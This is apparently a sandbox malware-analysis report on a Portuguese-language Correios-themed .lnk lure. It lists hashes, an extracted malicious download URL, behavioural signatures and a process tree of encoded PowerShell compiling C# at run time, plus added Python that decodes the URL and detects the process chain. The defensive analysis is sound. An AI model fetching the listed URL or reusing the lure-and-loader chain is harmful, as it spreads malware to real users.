Analysis

Max time kernel: 51s
Max time network: 51s
Platform: windows10-2004_x64
Resource: win10v2004-20240508-en
Resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
Submitted: 13-06-2024 02:31

Static task: static1
Behavioral task: behavioral1
  Sample: Mercadoria_Devolvida-Correios-H0C42E2H.lnk
  Resource: win7-20240611-en
Behavioral task: behavioral2
  Sample: Mercadoria_Devolvida-Correios-H0C42E2H.lnk
  Resource: win10v2004-20240508-en
(The platform and resource above match behavioral2, so the results below are from the Windows 10 run.)

General
- Target: Mercadoria_Devolvida-Correios-H0C42E2H.lnk (Portuguese for "Returned Merchandise - Correios", the Brazilian postal service; a delivery-themed lure)
- Size: 3KB
- MD5: 246e74b6fffb9d5994f7f70bb6509b45
- SHA1: 4b7bdf4808ce987b9f94ea40bdd081217867483a
- SHA256: 0db8cc27123c8bbd5ae0139980b604c514caeeed51da22d67d440e5369f8be1e
- SHA512: 178cf1ff0d8213ff94de68f5c1c267d50c3a958126925a2c50a554a29229c6f6834d1bf140fdb9f7168352d068880c7730e047e177496af0a8b57dde62fd8e08
Malware Config
- Extracted URL: https://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%
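The query string of the extracted URL is a URL-encoded base64 blob: %3D%3D is the "==" padding, and the trailing "%" is a stray character in the record. Decoded, it reads https://1361227624.rsc.cdn77.org/v2|wr31, the same host and path with a "|wr31" token appended; what the loader does with that token is not shown on this page. The Python below is an added example, not part of the report or of the sample, that performs the decode while tolerating the stray character; the function names are ours.

```python
import base64
import re
from urllib.parse import unquote, urlparse

# The config URL exactly as it appears in this report's "Extracted" entry.
EXTRACTED_URL = (
    "https://1361227624.rsc.cdn77.org/v2/gl.php?"
    "aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%"
)

# Anything outside the standard base64 alphabet (the stray trailing '%',
# whitespace from copy/paste, the '=' padding itself) is dropped before
# decoding; the padding is recomputed afterwards.
_NOT_B64 = re.compile(r"[^A-Za-z0-9+/]")


def decode_gl_param(url: str) -> str:
    """Return the plaintext carried in gl.php's query string.

    The query string has no key=value form: the whole string is the value.
    It is percent-decoded first (%3D -> '='), then stripped of every
    character that cannot be base64, then re-padded to a multiple of 4 so
    that a truncated or over-padded copy still decodes.
    """
    raw = unquote(urlparse(url).query)
    cleaned = _NOT_B64.sub("", raw)
    cleaned += "=" * (-len(cleaned) % 4)
    return base64.b64decode(cleaned, validate=True).decode("utf-8", errors="replace")


def split_decoded(value: str) -> "tuple[str, str]":
    """Split the decoded value at its '|' separator into (url, token).

    The decoded string is '<url>|<token>'; the meaning of the token is not
    established by the report, so it is only separated here, not interpreted.
    """
    target, _, token = value.partition("|")
    return target, token


if __name__ == "__main__":
    plaintext = decode_gl_param(EXTRACTED_URL)
    print(plaintext)
    print(split_decoded(plaintext))
```

Run it as-is to reproduce the decode; point decode_gl_param at any other gl.php URL from the same family to compare the embedded target with the host it was served from.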
Signatures

Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence.
  Description: Key value queried
  IoC: \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation
  Process: cmd.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (3 IoCs)
  PID   Process
  4268  powershell.exe
  4268  powershell.exe
  4268  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
  Description               PID   Process
  Token: SeDebugPrivilege   4268  powershell.exe

Suspicious use of WriteProcessMemory (6 IoCs)
  Description                        PID   Process         procid_target
  PID 4392 wrote to memory of 4268   4392  cmd.exe         84
  PID 4392 wrote to memory of 4268   4392  cmd.exe         84
  PID 4268 wrote to memory of 2812   4268  powershell.exe  85
  PID 4268 wrote to memory of 2812   4268  powershell.exe  85
  PID 2812 wrote to memory of 4928   2812  csc.exe         86
  PID 2812 wrote to memory of 4928   2812  csc.exe         86
Every entry is a parent writing into a child it has just created (cmd.exe -> powershell.exe -> csc.exe -> cvtres.exe). That is routine at process launch and is not by itself evidence of injection into an unrelated process; the SeDebugPrivilege request by powershell.exe is the more telling item.
Processes

C:\Windows\system32\cmd.exe (PID 4392)
  cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-H0C42E2H.lnk
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4268)
    "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en <encoded command omitted from this record>
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID 2812)
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4mmjhbno\4mmjhbno.cmdline"
      - Suspicious use of WriteProcessMemory

      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID 4928)
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES50CF.tmp" "c:\Users\Admin\AppData\Local\Temp\4mmjhbno\CSCD60A370FA8448CE91C281C09BEDF7DF.TMP"

Reading the tree: cmd.exe opens the .lnk, whose target starts powershell.exe with -en (an abbreviation of -EncodedCommand, so the script body is base64 on the command line). A csc.exe invocation with /noconfig /fullpaths and a .cmdline response file in a randomly named %TEMP% subfolder, followed by cvtres.exe, is the pattern PowerShell's Add-Type produces when it compiles C# at run time, so the encoded script very likely compiles and loads a .NET assembly rather than shipping a binary. The encoded command itself is not reproduced in this record.
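The process tree is what a detection engineer would key on: cmd.exe opening a .lnk, spawning powershell.exe with an encoded command, which in turn spawns csc.exe with a .cmdline response file under %TEMP%. The Python below is an added example, not taken from the report or from any detection product: it walks a list of process-creation events and reports every parent/child chain of that shape. The events are constructed here from the PIDs, images and command lines in the report; the root parent PID 1000, the benign build events and the event schema (pid, parent_pid, image, command_line) are assumptions, not a real log format.

```python
import re
from collections import defaultdict

# Constructed process-creation events. The first four mirror this report's
# process tree (PIDs, images and command lines as shown there); parent PID
# 1000 stands in for an unknown ancestor. The last two are a made-up benign
# compile from an interactive shell that must not be flagged.
EVENTS = [
    {"pid": 4392, "parent_pid": 1000, "image": r"C:\Windows\system32\cmd.exe",
     "command_line": r"cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-H0C42E2H.lnk"},
    {"pid": 4268, "parent_pid": 4392, "image": r"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en <encoded command omitted>'},
    {"pid": 2812, "parent_pid": 4268, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "command_line": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4mmjhbno\4mmjhbno.cmdline"'},
    {"pid": 4928, "parent_pid": 2812, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe",
     "command_line": r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES50CF.tmp" "c:\Users\Admin\AppData\Local\Temp\4mmjhbno\CSCD60A370FA8448CE91C281C09BEDF7DF.TMP"'},
    {"pid": 5100, "parent_pid": 1000, "image": r"C:\Windows\system32\cmd.exe",
     "command_line": r"cmd /c build.bat"},
    {"pid": 5101, "parent_pid": 5100, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "command_line": r"csc.exe /noconfig /fullpaths @C:\src\app\build.cmdline"},
]

# A .lnk path ending the argument (followed by whitespace, a quote, or end).
LNK_RE = re.compile(r"\.lnk(?=[\s\"']|$)", re.I)
# csc.exe reading a response file from under a Temp directory, the way
# PowerShell's Add-Type drives it: @"C:\...\Temp\<random>\<random>.cmdline"
TEMP_RESPONSE_RE = re.compile(r'@"?[^"\s]*\\Temp\\[^"\s]*\.cmdline', re.I)


def image_name(event):
    """Lower-cased file name of the process image."""
    return event["image"].rsplit("\\", 1)[-1].lower()


def has_encoded_command(command_line):
    """True if a powershell.exe command line uses -EncodedCommand.

    powershell.exe accepts any prefix of -EncodedCommand starting at -e
    (-e, -en, -enc, ...) plus the explicit -ec alias, so this is a prefix
    match rather than a fixed-string match.
    """
    for token in command_line.split():
        if token[:1] in ("-", "/"):
            key = token[1:].lower()
            if key == "ec" or (key and "encodedcommand".startswith(key)):
                return True
    return False


def find_compile_chains(events):
    """Return (cmd_pid, powershell_pid, csc_pid) for every chain of the shape
    cmd.exe <.lnk> -> powershell.exe -EncodedCommand -> csc.exe @Temp\\...cmdline."""
    children = defaultdict(list)
    for event in events:
        children[event["parent_pid"]].append(event)

    hits = []
    for cmd in events:
        if image_name(cmd) != "cmd.exe" or not LNK_RE.search(cmd["command_line"]):
            continue
        for ps in children[cmd["pid"]]:
            if image_name(ps) not in ("powershell.exe", "pwsh.exe"):
                continue
            if not has_encoded_command(ps["command_line"]):
                continue
            for csc in children[ps["pid"]]:
                if image_name(csc) == "csc.exe" and TEMP_RESPONSE_RE.search(csc["command_line"]):
                    hits.append((cmd["pid"], ps["pid"], csc["pid"]))
    return hits


if __name__ == "__main__":
    for chain in find_compile_chains(EVENTS):
        print("LNK -> encoded PowerShell -> csc.exe chain, PIDs:", chain)
```

The three-stage match is deliberately narrow: csc.exe alone is noisy on developer hosts, and an encoded PowerShell command alone is common in management tooling, but a .lnk-launched cmd.exe whose encoded PowerShell child compiles from %TEMP% is the specific sequence this sample shows.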
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 3KB
  MD5: 0c39411b5d7354d62bc468e1ecc003cf
  SHA1: f303e17b70669aafd6a78621c683cbbc0e9d68b3
  SHA256: d79a3d27b16155dc85d3ee3119a11db06077c704acfae526f9bfe1cb5e1fb6bb
  SHA512: 00c71134e54b4b256b7de7de91b40a6af2261244ede10b808e95011a96f37f9982c0fe51d79b134574d01b088236456008caa6418037d41d45bf2e9ed3ed8641
- Filesize: 1KB
  MD5: d86f725d547cb238fc0e460a6ec552f5
  SHA1: 2928afba43f00889d5e35240c7efb3d94c6e1918
  SHA256: 96323c77c7ab3ce4ded15543adf859c75dc903c3acddc8cdd9c7b5d11e847f81
  SHA512: a3c5251303214d05e6c20a74ce13c1ea4eb357e64484b3cdd4214a496b6b20649a04bfcf8421da8e00622cff6cf4fb38bf20550ce7293c0cfae0c8bcc7ed6017
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 187B
  MD5: 7b0e7177dfbb9edd1c1ef08b4fdfae2f
  SHA1: cb11a0252cdad66ec247312ccb7feb46456e52b6
  SHA256: 6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa
  SHA512: 7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd
- Filesize: 369B
  MD5: c7c971702ae33f87a3c605e7f9a8e3c2
  SHA1: 514d554d797228435d6a0751801826f058c0ed29
  SHA256: aa232abe9b41ebdeff838a369cc012a1a1c46b870a321e7ac2a0f5f29a1d6a4e
  SHA512: c14de704b6ea142b29899cfd8471a0d7d31419ac672228a2e96e39f093a3ba3f5f73e01e9a1e5c10ba13b6a275e36c6ab8ce950d20859fd106d229685f656b39
- Filesize: 652B
  MD5: 32f206c989422b3df2f6225c9ac5f9be
  SHA1: 748aef167a738192b6ef21c964c30d9b169d2e4d
  SHA256: 5c3bb3f60b056476c2be7e746625fbddc7edd8cf6630dc873895511ad3964e0c
  SHA512: edb9f7af5c9ed9e3ddfc6e32c407fa01fd09c54e5eee8f102c4dcff53c5631650c9d131f9e96ccb6447ce9f8d4979f7a6fb0ff9fb1e32b66130c58a85b2e2c02